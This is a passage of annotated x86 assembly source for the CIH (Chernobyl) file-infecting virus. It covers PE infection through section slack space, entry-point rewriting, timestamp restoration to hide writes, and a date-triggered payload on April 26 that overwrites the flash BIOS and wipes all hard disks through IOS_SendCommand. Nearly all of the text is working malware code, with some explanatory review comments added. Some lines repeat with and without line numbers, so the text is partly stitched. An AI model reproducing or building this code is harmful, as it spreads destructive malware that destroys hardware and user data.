; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
; Table layout, matching the carrier's `dd 0, VirusSize`: the last dword is the
; first chunk's size; each further entry is (address, size) growing downwards,
; and a 0 address terminates.
lea eax, [eax+edi-04h]
mov [eax], ebx
; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************
push ebx ; Size
add edx, edi ; first chunk follows the table
push edx ; Pointer of File
lea edi, (MyVirusStart-@9)[esi] ; source = resident copy of MyVirusStart
push edi ; Address of Buffer
; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
; The file offset is used directly as the RVA; valid only because the header
; region is mapped at RVA 0 with its file layout.
mov (NewAddressOfEntryPoint-@9)[esi], edx
; ***************************
; * Setup Initial Data *
; ***************************
lea edx, [esi-SizeOfScetionTable] ; one entry before the table so the loop's add lands on section 0
mov ebp, offset VirusSize ; EBP = bytes still to place
jmp StartToWriteCodeToSections
; ***************************
; * Write Code to Sections *
; ***************************
; For each section with SizeOfRawData > VirtualSize, the gap is claimed: a
; write triple is queued, a table entry (size, VA) is added, VirtualSize is
; grown so the bytes become part of the mapped image, and the section is
; marked initialized-data + readable.
LoopOfWriteCodeToSections:
add edx, SizeOfScetionTable
mov ebx, (SizeOfRawData-@9)[edx]
sub ebx, (VirtualSize-@9)[edx]
jbe EndOfWriteCodeToSections ; no gap in this section
push ebx ; Size
sub eax, 08h
mov [eax], ebx ; table entry: size
mov ebx, (PointerToRawData-@9)[edx]
add ebx, (VirtualSize-@9)[edx]
push ebx ; Pointer of File
push edi ; Address of Buffer
mov ebx, (VirtualSize-@9)[edx]
add ebx, (VirtualAddress-@9)[edx]
add ebx, (ImageBase-@9)[esi]
mov [eax+4], ebx ; table entry: VA where this chunk will be mapped
mov ebx, [eax]
add (VirtualSize-@9)[edx], ebx

; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or (Characteristics-@9)[edx], 40000040h
StartToWriteCodeToSections:
sub ebp, ebx
jbe SetVirusCodeSectionTableEndMark ; everything placed (last chunk may be oversized)
add edi, ebx ; Move Address of Buffer
EndOfWriteCodeToSections:
loop LoopOfWriteCodeToSections
; ***************************
; * Only Set Infected Mark *
; ***************************
; Reached when no room is found: drop all queued writes except the mark, so the
; file is tagged and never examined again even though it carries no code.
OnlySetInfectedMark:
mov esp, dr1
jmp WriteVirusCodeToFile
; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; ***************************
SetVirusCodeSectionTableEndMark:

; Adjust Size of Virus Section Code to Correct Value
; EBP <= 0 here; adding it trims the last chunk (table entry and queued size)
; to the bytes that remain.
add [eax], ebp
add [esp+08h], ebp

; Set End Mark
xor ebx, ebx
mov [eax-04h], ebx
; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************
; The resident copy is the image written into victims, so the call sites the
; VMM already patched in it are rewritten back to `int 20h` + service ID,
; walking from LastVxDCallAddress backwards by the deltas in
; VxDCallAddressTable (tables defined beyond this excerpt).
lea eax, (LastVxDCallAddress-2-@9)[esi]
mov cl, VxDCallTableSize
LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh ; int 20h
mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
mov [eax+2], edx ; service ID
movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
sub eax, edx
loop LoopOfRestoreVxDCallID
; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************
; Relative to the saved ESP: [DR1] = buffer of the mark triple (= the
; IFSMgr_Ring0_FileIO entry), [DR1+10h] = file handle.
WriteVirusCodeToFile:
mov eax, dr1
mov ebx, [eax+10h]
mov edi, [eax]
LoopOfWriteVirusCodeToFile:
pop ecx ; buffer address, or the 0 end mark
jecxz SetFileModificationMark
mov esi, ecx
mov eax, 0d601h ; write
pop edx ; file offset
pop ecx ; size
call edi ; VXDCall IFSMgr_Ring0_FileIO
jmp LoopOfWriteVirusCodeToFile
  830. ; ***************************
  831. ; * Let's Set CF = 1 ==> *
  832. ; * Need to Restore File *
  833. ; * Modification Time *
  834. ; ***************************
; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************
; Pops the handle and the EFLAGS pushed after the open (CF = 0) and replaces
; the latter with CF = 1, flagging that the file was written.
SetFileModificationMark:
pop ebx
pop eax
stc ; Enable CF(Carry Flag)
pushf
; *************************************
; * Close File *
; *************************************
; Entered directly from the PE/mark check with the CF = 0 marker still on the
; stack when the file was not touched.
CloseFile:
xor eax, eax
mov ah, 0d7h ; close, EBX = handle
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************
popf
pop esi ; ESI = FileNameBuffer
; NOTE(review): the payload's date check sits on the "not infected" path, i.e.
; it is evaluated whenever an existing .EXE that is not a clean PE (or is
; already marked) is opened; IsKillComputer continues beyond this excerpt.
jnc IsKillComputer
; *************************************
; * Restore File Modification Time *
; *************************************
; AX = 4303h sets date/time from the values captured in pIFSFunc during the
; virus's own open, hiding the write from mtime-based checks. The dword load at
; +2 is only needed for its low word (the date).
mov ebx, edi
mov ax, 4303h
mov ecx, (FileModificationTime-@7)[esi]
mov edi, (FileModificationTime+2-@7)[esi]
call ebx ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Disable OnBusy *
; *************************************
DisableOnBusy:
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy
; *************************************
; * Call Previous FileSystemApiHook *
; *************************************
; Tail-jumps to the hook that was installed before this one (pointer kept in
; DR0), so the original request still reaches the rest of the chain.
prevhook:
popad
mov eax, dr0 ;
jmp [eax] ; Jump to prevhook
  874. ; *************************************
  875. ; * Call the Function that the IFS *
  876. ; * Manager Would Normally Call to *
  877. ; * Implement this Particular I/O *
  878. ; * Request. *
  879. ; *************************************
  880. pIFSFunc:
  881. mov ebx, esp
  882. push dword ptr [ebx+20h+04h+14h] ; Push pioreq
  883. call [ebx+20h+04h] ; Call pIFSFunc
  884. pop ecx ;
  885. mov [ebx+1ch], eax ; Modify EAX Value in Stack
  886. ; ***************************
  887. ; * After Calling pIFSFunc, *
  888. ; * Get Some Data from the *
  889. ; * Returned pioreq. *
  890. ; ***************************
  891. cmp dword ptr [ebx+20h+04h+04h], 00000024h
  892. jne QuitMyVirusFileSystemHook
  893. ; *****************
  894. ; * Get the File *
  895. ; * Modification *
  896. ; * Date and Time *
  897. ; * in DOS Format.*
  898. ; *****************
  899. mov eax, [ecx+28h]
  900. mov (FileModificationTime-@6)[esi], eax
  901. ; ***************************
  902. ; * Quit My Virus' *
  903. ; * IFSMgr_FileSystemHook *
  904. ; ***************************
  905. QuitMyVirusFileSystemHook:
  906. popad
  907. ret
  908. ; *************************************
  909. ; * Kill Computer !? ... *^_^* *
  910. ; *************************************
  911. IsKillComputer:
  912. ; Get Now Month from BIOS CMOS
  913. mov ax, 0708h
  914. out 70h, al
  915. in al, 71h
  916. xchg ah, al
  917.  
  918. ; Get Now Day from BIOS CMOS
  919. out 70h, al
  920. in al, 71h
  921. xor ax, 0426h ; 04/26/????
  922. jne DisableOnBusy
  923. ; **************************************
  924. ; * Kill Kill Kill Kill Kill Kill Kill *
  925. ; **************************************
  926.  
  927. ; ***************************
  928. ; * Kill BIOS EEPROM *
  929. ; ***************************
  930. mov bp, 0cf8h
  931. lea esi, IOForEEPROM-@7[esi]
  932. ; ***********************
  933. ; * Show BIOS Page in *
  934. ; * 000E0000 - 000EFFFF *
  935. ; * ( 64 KB ) *
  936. ; ***********************
  937. mov edi, 8000384ch
  938. mov dx, 0cfeh
  939. cli
  940. call esi
  941. ; ***********************
  942. ; * Show BIOS Page in *
  943. ; * 000F0000 - 000FFFFF *
  944. ; * ( 64 KB ) *
  945. ; ***********************
  946. mov di, 0058h
  947. dec edx ; and al,0fh
  948. mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
  949. call esi
  950. ; ***********************
  951. ; * Show the BIOS Extra *
  952. ; * ROM Data in Memory *
  953. ; * 000E0000 - 000E01FF *
  954. ; * ( 512 Bytes ) *
  955. ; * , and the Section *
  956. ; * of Extra BIOS can *
  957. ; * be Written... *
  958. ; ***********************
  959. lea ebx, EnableEEPROMToWrite-@10[esi]
  960. mov eax, 0e5555h
  961. mov ecx, 0e2aaah
  962. call ebx
  963. mov byte ptr [eax], 60h
  964. push ecx
  965. loop $
  966. ; ***********************
  967. ; * Kill the BIOS Extra *
  968. ; * ROM Data in Memory *
  969. ; * 000E0000 - 000E007F *
  970. ; * ( 80h Bytes ) *
  971. ; ***********************
  972. xor ah, ah
  973. mov [eax], al
  974. xchg ecx, eax
  975. loop $
  976. ; ***********************
  977. ; * Show and Enable the *
  978. ; * BIOS Main ROM Data *
  979. ; * 000E0000 - 000FFFFF *
  980. ; * ( 128 KB ) *
  981. ; * can be Written... *
  982. ; ***********************
  983. mov eax, 0f5555h
  984. pop ecx
  985. mov ch, 0aah
  986. call ebx
  987. mov byte ptr [eax], 20h
  988. loop $
  989. ; ***********************
  990. ; * Kill the BIOS Main *
  991. ; * ROM Data in Memory *
  992. ; * 000FE000 - 000FE07F *
  993. ; * ( 80h Bytes ) *
  994. ; ***********************
  995. mov ah, 0e0h
  996. mov [eax], al
  997. ; ***********************
  998. ; * Hide BIOS Page in *
  999. ; * 000F0000 - 000FFFFF *
  1000. ; * ( 64 KB ) *
  1001. ; ***********************
  1002. ; or al,10h
  1003. mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
  1004. call esi
  1005. ; ***************************
  1006. ; * Kill All HardDisk *
  1007. ; ***************************************************
  1008. ; * IOR Structure of IOS_SendCommand Needs *
  1009. ; ***************************************************
  1010. ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
  1011. ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
  1012. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
  1013. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
  1014. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
  1015. ; ***************************************************
  1016. KillHardDisk:
  1017. xor ebx, ebx
  1018. mov bh, FirstKillHardDiskNumber
  1019. push ebx
  1020. sub esp, 2ch
  1021. push 0c0001000h
  1022. mov bh, 08h
  1023. push ebx
  1024. push ecx
  1025. push ecx
  1026. push ecx
  1027. push 40000501h
  1028. inc ecx
  1029. push ecx
  1030. push ecx
  1031. mov esi, esp
  1032. sub esp, 0ach
  1033. LoopOfKillHardDisk:
  1034. int 20h
  1035. dd 00100004h ; VXDCall IOS_SendCommand
  1036. cmp word ptr [esi+06h], 0017h
  1037. je KillNextDataSection
  1038. ChangeNextHardDisk:
  1039. inc byte ptr [esi+4dh]
  1040. jmp LoopOfKillHardDisk
  1041. KillNextDataSection:
  1042. add dword ptr [esi+10h], ebx
  1043. mov byte ptr [esi+4dh], FirstKillHardDiskNumber
  1044. jmp LoopOfKillHardDisk
  1045. ; ***************************
  1046. ; * Enable EEPROM to Write *
  1047. ; ***************************
  1048. EnableEEPROMToWrite:
  1049. mov [eax], cl
  1050. mov [ecx], al
  1051. mov byte ptr [eax], 80h
  1052. mov [eax], cl
  1053. mov [ecx], al
  1054. ret
  1055. ; ***************************
  1056. ; * IO for EEPROM *
  1057. ; ***************************
  1058. IOForEEPROM:
  1059. @10 = IOForEEPROM
  1060. xchg eax, edi
  1061. xchg edx, ebp
  1062. out dx, eax
  1063. xchg eax, edi
  1064. xchg edx, ebp
  1065. in al, dx
  1066. BooleanCalculateCode = $
  1067. or al, 44h
  1068. xchg eax, edi
  1069. xchg edx, ebp
  1070. out dx, eax
  1071. xchg eax, edi
  1072. xchg edx, ebp
  1073. out dx, al
  1074. ret
  1075. ; *********************************************************
  1076. ; * Static Data *
  1077. ; *********************************************************
  ; Static data carried with the code. The two tables below index the VxD
  ; services the code invokes: the byte table stores the distance between
  ; successive call sites (each delta must therefore fit in one byte), the
  ; dword table stores the corresponding VxD service IDs.
  1078. LastVxDCallAddress = IFSMgr_Ring0_FileIO
  1079. VxDCallAddressTable db 00h
  1080. db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
  1081. db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
  1082. db IFSMgr_Ring0_FileIO-UniToBCSPath
  ; Service IDs (high word = VxD device, low word = service), presumably in
  ; the same order as the deltas above: _PageAllocate,
  ; IFSMgr_RemoveFileSystemApiHook, UniToBCSPath, IFSMgr_Ring0_FileIO
  ; -- verify against the call sites earlier in the file.
  1083. VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
  1084. VxDCallTableSize = ($-VxDCallIDTable)/04h
  1085. ; *********************************************************
  1086. ; * Virus Version Copyright *
  1087. ; *********************************************************
  ; Plain-text marker 'CIH v<major>.<minor> TTIT' stored in the body; a
  ; stable static signature that scanners can match on.
  1088. VirusVersionCopyright db 'CIH v'
  1089. db MajorVirusVersion+'0'
  1090. db '.'
  1091. db MinorVirusVersion+'0'
  1092. db ' TTIT'
  1093. ; *********************************************************
  1094. ; * Virus Size *
  1095. ; *********************************************************
  ; VirusSize covers only the code and static data up to this point; the
  ; per-host section table described in the comment lines below is added
  ; on top of it and is not known until a host file is examined.
  1096. VirusSize = $
  1097. ; + SizeOfVirusCodeSectionTableEndMark(04h)
  1098. ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
  1099. ; + SizeOfTheFirstVirusCodeSectionTable(04h)
  1100. ; *********************************************************
  1101. ; * Dynamic Data *
  1102. ; *********************************************************
  ; Uninitialised ('?') scratch area placed after the body; it is not counted
  ; in VirusSize. @6..@9 are the anchors the code uses for esi-relative
  ; addressing of these fields.
  1103. VirusGameDataStartAddress = VirusSize
  1104. @6 = VirusGameDataStartAddress
  1105. OnBusy db 0
  1106. FileModificationTime dd ?
  1107.  
  ; FileNameBufferSize is defined elsewhere in the file (not visible here).
  1108. FileNameBuffer db FileNameBufferSize dup(?)
  1109. @7 = FileNameBuffer
  1110.  
  ; NumberOfSections .. SizeOfHeaders follow the field order of the PE file
  ; header and optional header, so SizeOfImageHeaderToRead (below) lets one
  ; read fill all of them at once.
  1111. DataBuffer = $
  1112. @8 = DataBuffer
  1113. NumberOfSections dw ?
  1114. TimeDateStamp dd ?
  1115. SymbolsPointer dd ?
  1116. NumberOfSymbols dd ?
  1117. SizeOfOptionalHeader dw ?
  1118. _Characteristics dw ?
  1119. Magic dw ?
  1120. LinkerVersion dw ?
  1121. SizeOfCode dd ?
  1122. SizeOfInitializedData dd ?
  1123. SizeOfUninitializedData dd ?
  1124. AddressOfEntryPoint dd ?
  1125. BaseOfCode dd ?
  1126. BaseOfData dd ?
  1127. ImageBase dd ?
  1128. @9 = $
  1129. SectionAlignment dd ?
  1130. FileAlignment dd ?
  1131. OperatingSystemVersion dd ?
  1132. ImageVersion dd ?
  1133. SubsystemVersion dd ?
  1134. Reserved dd ?
  1135. SizeOfImage dd ?
  1136. SizeOfHeaders dd ?
  1137. SizeOfImageHeaderToRead = $-NumberOfSections
  1138.  
  ; The header write-back reuses the start of DataBuffer and writes only one
  ; DWORD (the new entry point).
  1139. NewAddressOfEntryPoint = DataBuffer ; DWORD
  1140. SizeOfImageHeaderToWrite = 04h
  1141.  
  ; Field aliases for one section-table entry overlaid at @9; the offsets
  ; and the 28h total match the PE IMAGE_SECTION_HEADER layout.
  ; (sic: "NumberOfLinenNmbers" and "SizeOfScetionTable" are the author's
  ; spellings and are kept because other code refers to them.)
  1142. StartOfSectionTable = @9
  1143. SectionName = StartOfSectionTable ; QWORD
  1144. VirtualSize = StartOfSectionTable+08h ; DWORD
  1145. VirtualAddress = StartOfSectionTable+0ch ; DWORD
  1146. SizeOfRawData = StartOfSectionTable+10h ; DWORD
  1147. PointerToRawData = StartOfSectionTable+14h ; DWORD
  1148. PointerToRelocations = StartOfSectionTable+18h ; DWORD
  1149. PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
  1150. NumberOfRelocations = StartOfSectionTable+20h ; WORD
  1151. NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
  1152. Characteristics = StartOfSectionTable+24h ; DWORD
  1153. SizeOfScetionTable = Characteristics+04h-SectionName
  1154. ; *********************************************************
  1155. ; * Virus Total Need Memory *
  1156. ; *********************************************************
  ; VirusNeedBaseMemory is the fixed part; the real total depends on the
  ; host's NumberOfSections, as the comment lines below spell out.
  1157. VirusNeedBaseMemory = $
  1158. VirusTotalNeedMemory = @9
  1159. ; + NumberOfSections(??)*SizeOfScetionTable(28h)
  1160. ; + SizeOfVirusCodeSectionTableEndMark(04h)
  1161. ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
  1162. ; + SizeOfTheFirstVirusCodeSectionTable(04h)
  1163. ; *********************************************************
  ; FileHeader (the entry label named in END) is defined earlier in the file.
  1164. VirusGame ENDS
  1165. END FileHeader